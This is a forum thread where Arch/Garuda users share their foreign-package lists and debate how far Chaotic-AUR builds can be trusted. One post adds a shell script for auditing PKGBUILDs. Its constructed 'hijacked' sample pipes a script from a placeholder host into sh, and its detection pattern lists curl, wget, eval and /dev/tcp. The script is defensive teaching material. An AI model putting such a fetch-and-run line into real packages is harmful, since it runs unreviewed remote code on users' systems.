Post your pacman -Qm

Chaotic-AUR is a literal hack for minimizing foreign packages. I have just 2 packages to enable keyboard RGB control.

```
mr-victory% pacman -Qm
clevo-xsm-wmi-dkms 1.1-7
clevo-xsm-wmi-util 1.1-1
```
1 Like

Well, they're still foreign, and largely not audited. Chaotic just provides prebuilt AUR packages, which is arguably not good, as they don't check them and users trust them, so users don't check either.

Unless you can be very certain of the pkg or pkgbuild provider, I recommend making your own pkgbuild, or if you must use the AUR, don't use automated tools for it.

That’s just my paranoid 2 cents

3 Likes

Here are my foreign packages

I made the pkgbuild for vkbasalt but NoWrep is fairly well known for their work and they maintain the AUR pkgbuild for vkcapture which they develop.

```
pacman -Qm
lib32-obs-vkcapture-git r218.e35dec2-1
lib32-vkbasalt 0.3.2.6-1
obs-vkcapture-git r218.e35dec2-1
vkbasalt 0.3.2.6-1
```

I use the Arch repo pkgbuild for building mesa and I just change the sources to the Mesa main branch for mesa-git.

Packages are built by clusters Garuda devs maintain and the packages are signed so you need to import a key before using them so there is a certain level of security. By habit if a package isn’t on Chaotic AUR I just clone it, read the PKGBUILD and compile myself.

1 Like

That only assures in-flight security; the issue isn't whether the package is signed or not. The build servers do hourly/daily builds and the pkgbuild content isn't actively audited.

They don't have the manpower to audit each pkgbuild and keep the build frequency they have. Chaotic AUR should be treated exactly like the AUR and with as much suspicion. The "it's signed so it's OK" thought process is exactly the sort of issue I was referring to. With the pkgs from the Arch repo you at least have some assurance from trusted maintainers that pkgbuilds aren't just thrown out there and the pkgs aren't just built/released hourly/daily.

I'm not saying don't use Chaotic; I'm saying don't trust it, just like you shouldn't trust just any AUR pkgbuild. Unless you know you can trust that pkgbuild maintainer and can be sure someone hasn't tampered with it by taking over the pkgbuild, any AUR pkg is a security concern and a foreign pkg.

Quote from PedroHLC who founded chaotic

chaotic-aur maintainer here.

Is it safe to use?

Nope. We build in containers, enforce HTTPS to connect to the AUR, and manually approve GPG keys of sources, but everything goes to waste while we trust openly in the AUR, because any user can obtain an orphan package, upload whatever he wants there, and that will be signed and redistributed as ours.

However, you can trust that a package X is built from the same PKGBUILD as seen in the AUR. So before installing/updating something from the repo you can always check if the PKGBUILD is safe, as you should do when installing with AUR helpers.

Well, I used to be a member of SIn's red team, pen-testing UFSCar itself (lonewolf's host). So there is a bare-minimum security setup in place in both clusters. Soon we'll move hosting and building to a new infra that will isolate everything even more.

Maybe in the future we'll move to having two repos: one with reviewed PKGBUILDs and one "staging" with the untrustworthy latest.

2 Likes
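Several posts above come down to the same advice: the signature on a Chaotic-AUR package only proves it was built from the PKGBUILD currently in the AUR, so the PKGBUILD itself has to be read before building or updating, and reading it means not executing it. The following is an added example (my own, not code from the thread, from Chaotic-AUR or from makepkg) of a small POSIX shell helper that makes a reviewer's first-pass checks on a freshly cloned PKGBUILD without ever sourcing it. The function names are hypothetical, the two sample recipes are constructed for the demo, and `example.invalid` is not a real host.

```shell
#!/bin/sh
# Added example, not from the thread: text-only review of an AUR PKGBUILD.
# Sourcing a PKGBUILD runs whatever is in it, so everything here is grep/awk.

# Print the elements of a PKGBUILD array assignment such as
#   source=("https://host/x-1.0.tar.gz"
#           'x.install')
# one per line, without executing anything. $1 = array name, $2 = file.
pkgbuild_array() {
  awk -v name="$1" '
    $0 ~ ("^" name "=\\(") { inarr = 1; sub("^" name "=\\(", "") }
    inarr {
      line = $0
      if (line ~ /\)[ \t]*$/) { sub(/\)[ \t]*$/, "", line); inarr = 0 }
      sub(/[ \t]#.*$/, "", line)        # trailing comment; keeps "#tag=" inside URLs
      n = split(line, parts, /[ \t]+/)
      for (i = 1; i <= n; i++) {
        p = parts[i]; gsub(/["'"'"']/, "", p)
        if (p != "") print p
      }
    }' "$2"
}

# Scan one PKGBUILD and print findings. Returns 0 when nothing stands out,
# 1 when a human must read it before building. $1 = path to PKGBUILD.
audit_pkgbuild() {
  f="$1"; rc=0
  # 1. Remote sources should arrive over an authenticated channel.
  for s in $(pkgbuild_array source "$f"); do
    s="${s#*::}"                       # drop the optional "localname::" prefix
    case "$s" in
      https://*|git+https://*) ;;      # TLS to the origin: fine
      *://*) echo "WARN unauthenticated source: $s"; rc=1 ;;
      *) ;;                            # local file shipped in the AUR git repo
    esac
  done
  # 2. SKIP accepts whatever the URL serves today; for git sources it also
  #    means no pinned commit unless the URL carries #commit=.
  for algo in md5sums sha1sums sha256sums sha512sums b2sums; do
    for s in $(pkgbuild_array "$algo" "$f"); do
      [ "$s" = SKIP ] && { echo "WARN $algo has SKIP"; rc=1; }
    done
  done
  # 3. install scriptlets run as root at install time; read them as well.
  grep -q '^install=' "$f" && echo "NOTE $(grep '^install=' "$f") runs as root on install"
  # 4. Download-and-run inside build()/package() is how a hijacked orphan
  #    package turns into malware delivery. Comment lines are ignored.
  hits=$(grep -nE 'curl|wget|base64 -d|eval |sudo |/dev/tcp' "$f" \
         | grep -vE '^[0-9]+:[[:space:]]*#' || true)
  if [ -n "$hits" ]; then printf 'WARN network/eval in recipe:\n%s\n' "$hits"; rc=1; fi
  return $rc
}

# Keep the copy you actually read; on the next update only re-review the diff.
# $1 = PKGBUILD reviewed last time, $2 = freshly fetched one.
# Returns 0 if they differ (re-read needed), 1 if identical.
pkgbuild_changed() {
  ! diff -u "$1" "$2"
}

# --- constructed sample recipes (not real AUR packages) ---
demo=$(mktemp -d); trap 'rm -rf "$demo"' EXIT
cat > "$demo/clean" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
source=("https://example.invalid/$pkgname-$pkgver.tar.gz"
        'fix-build.patch')
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210')
build() { make -C "$pkgname-$pkgver"; }
package() { make -C "$pkgname-$pkgver" DESTDIR="$pkgdir" install; }
EOF
# The same package after a "version bump" by whoever adopted the orphan.
cat > "$demo/hijacked" <<'EOF'
pkgname=example-tool
pkgver=1.2.1
pkgrel=1
source=("http://example.invalid/$pkgname-$pkgver.tar.gz"
        'fix-build.patch')
sha256sums=('SKIP'
            'fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210')
install=example-tool.install
build() { make -C "$pkgname-$pkgver"; }
package() {
  make -C "$pkgname-$pkgver" DESTDIR="$pkgdir" install
  curl -s https://example.invalid/post-install.sh | sh   # new in this bump
}
EOF

audit_pkgbuild "$demo/clean" && echo "clean: nothing flagged"
audit_pkgbuild "$demo/hijacked" || echo "hijacked: read it before building"
pkgbuild_changed "$demo/clean" "$demo/hijacked" && echo "PKGBUILD changed since last review"
```

To use it on a real package, `git clone https://aur.archlinux.org/<pkgname>.git`, keep the copy you reviewed, and run `pkgbuild_changed` against the new clone on every update so you only have to re-read the diff. `makepkg --printsrcinfo` would parse the arrays more reliably, but it sources the PKGBUILD, which is exactly the step this helper avoids until a human has looked at the file.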

heroic-games-launcher-beta-bin 2.5.0-2
libpamac-aur 11.4.1-1
mint-x-icons 1.6.4-1
optimus-manager 1.4-4
optimus-manager-qt 1.6.9-1
pamac-aur 10.4.3-1
protontricks-git 1.9.2.r4.gfd93e45-1
python-vdf 3.4-2

appimagelauncher 2.2.0-6
brave-bin 1:1.45.118-1
expressvpn 3.34.1.0-1
gestures 0.3.1-1
gtkhash 1.4-5
kvantum-qt5-git 1.0.6.r2.gd369913a-1
libinput-gestures 2.73-1
spotify 1:1.1.84.716-2
tradingview-bin 1.0.17-2
visual-studio-code-bin 1.73.0-1

Not much

bitwig-studio-earlyaccess 4.4.2-1
corectrl-git 1.2.0.r133.geccb490-1
frontieres-git 0.4.0-1
kernel-install-mkinitcpio 1.1-1
linux-xanmod 6.0.7-1
linux-xanmod-headers 6.0.7-1
mpv-git 0.34.0_541_g0f1ae8896e-1
plugdata-git r1598.cebce247-1
timeshift 22.06.5-2
vimix-gtk-themes-git r471.8e544ae-1
vital-synth 1.5.5-1
yay 11.3.0-1

That is an old version; 1.31 is available in the regular repos.

1 Like

oh good looks dog

jdk18-openj9-bin 18.0.2.1-1
jdk8-openj9-bin 8.u332.b09-1
pollymc-bin 5.1-1
snapper-support 1.1.2-2
turbowarp-desktop-bin 1.6.1-1

Prism Launcher fork

Interesting, Prism is a fork of MultiMC and other people forked Prism and named it PollyMC?

Ahem, the name was before PolyMC was dragged to its grave. I tried to get the dev to change the name, but he didn’t listen.

It’s a long winded pun. Pirates have parrots and Polly is a common parrot name, and cracked MC players (fk M$) are pirates.

Here is mine :

```
[mongoose@RS6-R ~]$ pacman -Qm
cnrdrvcups-sfp 5.00-3
gnome-icon-theme 3.12.0-7
gnome-icon-theme-symbolic 3.12.0-6
ivpn 3.9.45-1
ivpn-ui 3.9.45-1
libglade 2.6.4-8
menulibre 2.2.3-1
python2 2.7.18-8
teamviewer 15.35.5-1
woeusb-ng 0.2.10-1
[mongoose@RS6-R ~]$
```

Try putting it between triple backticks (```) next time.

python2 2.7.18-8

Ah yes, apps STILL use that?

among-us-dumpy-gif-maker 4.2.1-1
arronax 0.8.1-1
boost_ui 1.79.0-1
cpprestsdk 2.10.18-3
emusak-bin 2.1.9-1
etcher-bin 1.8.14-1
gdmap 0.8.1-7
gksu 2.0.2-6
glualint-bin 1.22.0-1
gogh-git 711.f8b6173-1
greetd-tuigreet-bin 0.8.0-0
icat 0.5-1
itch 1:1.26.0-2
kakoune-git 2022.10.31_r16_g91d45a10-1
libgksu 2.0.12-9.1
libgweather 40.0+r87+g80e5a652-2
libpipewire02 0.2.7-2
libvterm01 0.1.4-2
mdpdf-git r10.d93165f-1
megabasterd-bin 7.55-1
nerd-fonts-complete 2.2.2-2
olive-git continuous.r2299.g9d54e24d9-1
pass-git-helper 1.2.0-1
pass-update 2.1-2
pince-git r1222.9db33c3-1
proton-ge-custom-bin 1:GE_Proton7_41-1
python-keyboard 0.13.5-1
python-pygdbmi 0.10.0.0-2
sc-controller-git v0.4.8.9.r0.02ce12b4-1
soundux-git 1:r1431.5283c43-1
steamtinkerlaunch-git 11.11.r114.g4409f0d-1
waybar-git r2271.5250123d-1
wayfire-plugins-extra-git r153.39f97b1-1
wf-info-git r13.022800f-1
wf-msg-git r18.ff26b8f-1
wl-color-picker 1.3-1
wofi-calc 1.1-3
wofi-pass 0.0.1-2
xclicker 1.4.0-1
zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

Wofi is neat :)

How long would reinstalling all packages take?

The biggest packages are:

nerd-fonts-complete 2.2.2-2
olive-git continuous.r2299.g9d54e24d9-1
zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

All of which is ~10 GB if I'm not mistaken. It takes maybe 20 minutes for me.

zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

need not be counted, as they are binaries. Unless it's one of those fake -bin packages.

I remember binary packages being especially big. Zulu is also the JRE and JDK, so it should be reasonably thick.